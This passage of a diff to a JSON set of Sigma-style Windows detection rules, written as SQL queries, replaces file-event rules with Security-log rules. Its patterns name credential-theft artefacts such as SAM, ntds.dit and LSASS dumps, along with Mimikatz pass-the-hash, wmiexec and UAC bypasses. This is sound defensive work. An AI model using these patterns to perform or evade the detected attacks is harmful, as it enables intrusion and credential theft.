\"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "status": "test", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Unknown" + "Runas command-line tool using /netonly parameter" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND 
AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Suspicious Screensaver Binary File Creation", - "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", - "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "title": "SCM Database Privileged Operation", + "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "status": "test", + "description": "Detects non-system users performing privileged operation os the SCM database", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.002" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_scr_binary_file.yml" + "filename": "win_security_scm_database_privileged_operation.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the 
default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + 
"author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE 
'\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" - ], - "falsepositives": [ - "Rare cases of administrative activity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" + "attack.t1003.006" ], - "filename": "file_event_win_sam_dump.yml" - }, - { - "title": "ISO or Image Mount Indicator in Recent Files", - "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", - "status": "test", - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Cases in which a user mounts an image file for legitimate reasons" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_recent.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", - "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", + "title": "Suspicious Remote Logon with Explicit 
Credentials", + "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "status": "experimental", - "description": "Detects PowerShell creating a binary executable or script file.", - "author": "frack113", + "description": "Detects suspicious processes logging on with explicit credentials", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "tags": [ - "attack.persistence" + "attack.t1078", + "attack.lateral_movement" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Administrators that use the RunAS command or scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) 
AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_powershell_drop_binary.yml" + "filename": "win_security_susp_logon_explicit_credentials.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "title": "Remote Access Tool Services Have Been Installed - Security", + "id": "c8b00925-926c-47e3-beea-298fd563728e", "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "The rule doesn't look for anything suspicious so false positives are expected. 
If you use one of the tools mentioned, comment it out" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_service_install_remote_access_software.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "HybridConnectionManager Service Installation", + "id": 
"0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "description": "Rule to detect the Hybrid Connection Manager service installation.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 
'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "description": "Detects renaming of file while deletion with SDelete tool.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" ], "falsepositives": [ - "Legitimate add-ins" + "Legitimate usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', 
'4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_susp_sdelete.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND 
(TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DCERPC SMB Spoolss Named Pipe", + "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "status": "test", + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "author": "OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Domain Controllers acting as printer servers too? 
:)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Searchprotocolhost.exe likes to query these registry keys. 
To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + 